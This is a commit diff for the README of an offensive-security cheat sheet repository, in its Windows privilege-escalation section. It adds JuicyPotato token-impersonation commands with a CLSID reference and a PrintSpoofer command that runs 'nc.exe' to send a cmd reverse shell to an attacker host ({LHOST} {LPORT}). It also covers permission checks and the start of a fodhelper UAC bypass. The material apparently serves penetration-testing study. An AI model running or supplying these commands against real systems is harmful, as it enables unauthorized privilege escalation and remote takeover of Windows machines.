kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-10-22 08:58:05 -04:00
committed by GitHub
parent e7169644f4
commit e56f14ccd4
1 changed files with 12 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
README.md
View File

@@ -1037,19 +1037,25 @@ net user {USERNAME}
# Check UAC level # Check UAC level
whoami /groups whoami /groups
# Check Privileges for Impersonation
whoami /priv
JuicyPotato.exe -t * -p {run.exe} -l 8003
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
# Check File Permissions # Check File Permissions
Get-ACL {FILE or DIR} | fl Get-ACL {FILE or DIR} | fl
icacls {FILE} icacls {FILE}
# Juicy Potato for Impersonation
# Juicy Potato does not work for Windows Server 2019 and Windows 10 versions 1809 and higher.
whoami /priv
JuicyPotato.exe -t * -p {run.exe} -l 8003
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
# Powershell # Powershell
cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}" cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md # Print Spoofer for Impersonation
# Compatible for Windows 10 and Server 2016/2019.
PrintSpoofer.exe -c "nc.exe {LHOST} {LPORT} -e cmd"
# UAC BYPASS using Fodhelper.exe or Computer Defaults.exe # UAC BYPASS using Fodhelper.exe or Computer Defaults.exe
where /r C:\windows fodhelper.exe where /r C:\windows fodhelper.exe